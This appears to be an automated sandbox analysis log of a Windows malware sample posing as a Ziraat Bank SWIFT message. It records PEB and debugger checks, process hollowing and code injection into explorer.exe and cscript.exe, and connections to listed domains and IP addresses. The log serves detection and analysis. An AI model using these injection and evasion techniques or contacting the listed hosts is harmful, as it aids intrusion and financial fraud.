      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CA44B mov eax, dword ptr fs:[00000030h]1_2_018CA44B
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B0050 mov eax, dword ptr fs:[00000030h]1_2_018B0050
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B0050 mov eax, dword ptr fs:[00000030h]1_2_018B0050
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01961074 mov eax, dword ptr fs:[00000030h]1_2_01961074
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01952073 mov eax, dword ptr fs:[00000030h]1_2_01952073
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B746D mov eax, dword ptr fs:[00000030h]1_2_018B746D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A1B8F mov eax, dword ptr fs:[00000030h]1_2_018A1B8F
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A1B8F mov eax, dword ptr fs:[00000030h]1_2_018A1B8F
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01917794 mov eax, dword ptr fs:[00000030h]1_2_01917794
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01917794 mov eax, dword ptr fs:[00000030h]1_2_01917794
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01917794 mov eax, dword ptr fs:[00000030h]1_2_01917794
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0194D380 mov ecx, dword ptr fs:[00000030h]1_2_0194D380
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C2397 mov eax, dword ptr fs:[00000030h]1_2_018C2397
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CB390 mov eax, dword ptr fs:[00000030h]1_2_018CB390
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A8794 mov eax, dword ptr fs:[00000030h]1_2_018A8794
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195138A mov eax, dword ptr fs:[00000030h]1_2_0195138A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C4BAD mov eax, dword ptr fs:[00000030h]1_2_018C4BAD
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C4BAD mov eax, dword ptr fs:[00000030h]1_2_018C4BAD
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C4BAD mov eax, dword ptr fs:[00000030h]1_2_018C4BAD
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01965BA5 mov eax, dword ptr fs:[00000030h]1_2_01965BA5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019153CA mov eax, dword ptr fs:[00000030h]1_2_019153CA
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019153CA mov eax, dword ptr fs:[00000030h]1_2_019153CA
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BDBE9 mov eax, dword ptr fs:[00000030h]1_2_018BDBE9
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C03E2 mov eax, dword ptr fs:[00000030h]1_2_018C03E2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C03E2 mov eax, dword ptr fs:[00000030h]1_2_018C03E2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C03E2 mov eax, dword ptr fs:[00000030h]1_2_018C03E2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C03E2 mov eax, dword ptr fs:[00000030h]1_2_018C03E2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C03E2 mov eax, dword ptr fs:[00000030h]1_2_018C03E2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C03E2 mov eax, dword ptr fs:[00000030h]1_2_018C03E2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D37F5 mov eax, dword ptr fs:[00000030h]1_2_018D37F5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192FF10 mov eax, dword ptr fs:[00000030h]1_2_0192FF10
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192FF10 mov eax, dword ptr fs:[00000030h]1_2_0192FF10
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CA70E mov eax, dword ptr fs:[00000030h]1_2_018CA70E
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CA70E mov eax, dword ptr fs:[00000030h]1_2_018CA70E
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195131B mov eax, dword ptr fs:[00000030h]1_2_0195131B
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0196070D mov eax, dword ptr fs:[00000030h]1_2_0196070D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0196070D mov eax, dword ptr fs:[00000030h]1_2_0196070D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BF716 mov eax, dword ptr fs:[00000030h]1_2_018BF716
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01894F2E mov eax, dword ptr fs:[00000030h]1_2_01894F2E
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01894F2E mov eax, dword ptr fs:[00000030h]1_2_01894F2E
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CE730 mov eax, dword ptr fs:[00000030h]1_2_018CE730
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189DB40 mov eax, dword ptr fs:[00000030h]1_2_0189DB40
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AEF40 mov eax, dword ptr fs:[00000030h]1_2_018AEF40
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01968B58 mov eax, dword ptr fs:[00000030h]1_2_01968B58
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189F358 mov eax, dword ptr fs:[00000030h]1_2_0189F358
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189DB60 mov ecx, dword ptr fs:[00000030h]1_2_0189DB60
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AFF60 mov eax, dword ptr fs:[00000030h]1_2_018AFF60
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C3B7A mov eax, dword ptr fs:[00000030h]1_2_018C3B7A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C3B7A mov eax, dword ptr fs:[00000030h]1_2_018C3B7A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01968F6A mov eax, dword ptr fs:[00000030h]1_2_01968F6A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0192FE87 mov eax, dword ptr fs:[00000030h]1_2_0192FE87
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CD294 mov eax, dword ptr fs:[00000030h]1_2_018CD294
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CD294 mov eax, dword ptr fs:[00000030h]1_2_018CD294
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018952A5 mov eax, dword ptr fs:[00000030h]1_2_018952A5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018952A5 mov eax, dword ptr fs:[00000030h]1_2_018952A5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018952A5 mov eax, dword ptr fs:[00000030h]1_2_018952A5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018952A5 mov eax, dword ptr fs:[00000030h]1_2_018952A5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018952A5 mov eax, dword ptr fs:[00000030h]1_2_018952A5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01960EA5 mov eax, dword ptr fs:[00000030h]1_2_01960EA5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01960EA5 mov eax, dword ptr fs:[00000030h]1_2_01960EA5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01960EA5 mov eax, dword ptr fs:[00000030h]1_2_01960EA5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019146A7 mov eax, dword ptr fs:[00000030h]1_2_019146A7
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AAAB0 mov eax, dword ptr fs:[00000030h]1_2_018AAAB0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AAAB0 mov eax, dword ptr fs:[00000030h]1_2_018AAAB0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CFAB0 mov eax, dword ptr fs:[00000030h]1_2_018CFAB0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01968ED6 mov eax, dword ptr fs:[00000030h]1_2_01968ED6
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C36CC mov eax, dword ptr fs:[00000030h]1_2_018C36CC
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C2ACB mov eax, dword ptr fs:[00000030h]1_2_018C2ACB
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D8EC7 mov eax, dword ptr fs:[00000030h]1_2_018D8EC7
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0194FEC0 mov eax, dword ptr fs:[00000030h]1_2_0194FEC0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A76E2 mov eax, dword ptr fs:[00000030h]1_2_018A76E2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C2AE4 mov eax, dword ptr fs:[00000030h]1_2_018C2AE4
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C16E0 mov ecx, dword ptr fs:[00000030h]1_2_018C16E0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A8A0A mov eax, dword ptr fs:[00000030h]1_2_018A8A0A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189C600 mov eax, dword ptr fs:[00000030h]1_2_0189C600
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189C600 mov eax, dword ptr fs:[00000030h]1_2_0189C600
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189C600 mov eax, dword ptr fs:[00000030h]1_2_0189C600
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C8E00 mov eax, dword ptr fs:[00000030h]1_2_018C8E00
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CA61C mov eax, dword ptr fs:[00000030h]1_2_018CA61C
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CA61C mov eax, dword ptr fs:[00000030h]1_2_018CA61C
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B3A1C mov eax, dword ptr fs:[00000030h]1_2_018B3A1C
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01895210 mov eax, dword ptr fs:[00000030h]1_2_01895210
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01895210 mov ecx, dword ptr fs:[00000030h]1_2_01895210
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01895210 mov eax, dword ptr fs:[00000030h]1_2_01895210
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01895210 mov eax, dword ptr fs:[00000030h]1_2_01895210
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01951608 mov eax, dword ptr fs:[00000030h]1_2_01951608
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189AA16 mov eax, dword ptr fs:[00000030h]1_2_0189AA16
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189AA16 mov eax, dword ptr fs:[00000030h]1_2_0189AA16
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D4A2C mov eax, dword ptr fs:[00000030h]1_2_018D4A2C
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D4A2C mov eax, dword ptr fs:[00000030h]1_2_018D4A2C
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189E620 mov eax, dword ptr fs:[00000030h]1_2_0189E620
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0194FE3F mov eax, dword ptr fs:[00000030h]1_2_0194FE3F
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195EA55 mov eax, dword ptr fs:[00000030h]1_2_0195EA55
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01924257 mov eax, dword ptr fs:[00000030h]1_2_01924257
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01899240 mov eax, dword ptr fs:[00000030h]1_2_01899240
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01899240 mov eax, dword ptr fs:[00000030h]1_2_01899240
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01899240 mov eax, dword ptr fs:[00000030h]1_2_01899240
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01899240 mov eax, dword ptr fs:[00000030h]1_2_01899240
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A7E41 mov eax, dword ptr fs:[00000030h]1_2_018A7E41
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A7E41 mov eax, dword ptr fs:[00000030h]1_2_018A7E41
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A7E41 mov eax, dword ptr fs:[00000030h]1_2_018A7E41
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A7E41 mov eax, dword ptr fs:[00000030h]1_2_018A7E41
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A7E41 mov eax, dword ptr fs:[00000030h]1_2_018A7E41
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A7E41 mov eax, dword ptr fs:[00000030h]1_2_018A7E41
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195AE44 mov eax, dword ptr fs:[00000030h]1_2_0195AE44
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195AE44 mov eax, dword ptr fs:[00000030h]1_2_0195AE44
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A766D mov eax, dword ptr fs:[00000030h]1_2_018A766D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0194B260 mov eax, dword ptr fs:[00000030h]1_2_0194B260
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0194B260 mov eax, dword ptr fs:[00000030h]1_2_0194B260
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01968A62 mov eax, dword ptr fs:[00000030h]1_2_01968A62
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D927A mov eax, dword ptr fs:[00000030h]1_2_018D927A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BAE73 mov eax, dword ptr fs:[00000030h]1_2_018BAE73
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BAE73 mov eax, dword ptr fs:[00000030h]1_2_018BAE73
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BAE73 mov eax, dword ptr fs:[00000030h]1_2_018BAE73
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BAE73 mov eax, dword ptr fs:[00000030h]1_2_018BAE73
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018BAE73 mov eax, dword ptr fs:[00000030h]1_2_018BAE73
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D99A0 NtCreateSection,LdrInitializeThunk,1_2_018D99A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeDomain query: www.thetrendsinfo.com
      Source: C:\Windows\explorer.exeNetwork Connect: 68.66.216.12 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.notarpucarhr.com
      Source: C:\Windows\explorer.exeDomain query: www.oaksinstitute.net
      Source: C:\Windows\explorer.exeNetwork Connect: 103.11.189.189 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.multimediapages.com
      Source: C:\Windows\explorer.exeNetwork Connect: 141.136.43.229 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 38.239.92.131 80Jump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: BE0000Jump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeMemory written: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeThread register set: target process: 3320Jump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3320Jump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeJump to behavior
      Source: explorer.exe, 00000002.00000000.327649984.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.349944909.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.266356537.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000002.00000000.292800130.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.327649984.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.349944909.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000002.00000000.349491002.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.327649984.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.349944909.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000002.00000000.327649984.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.349944909.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.266356537.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
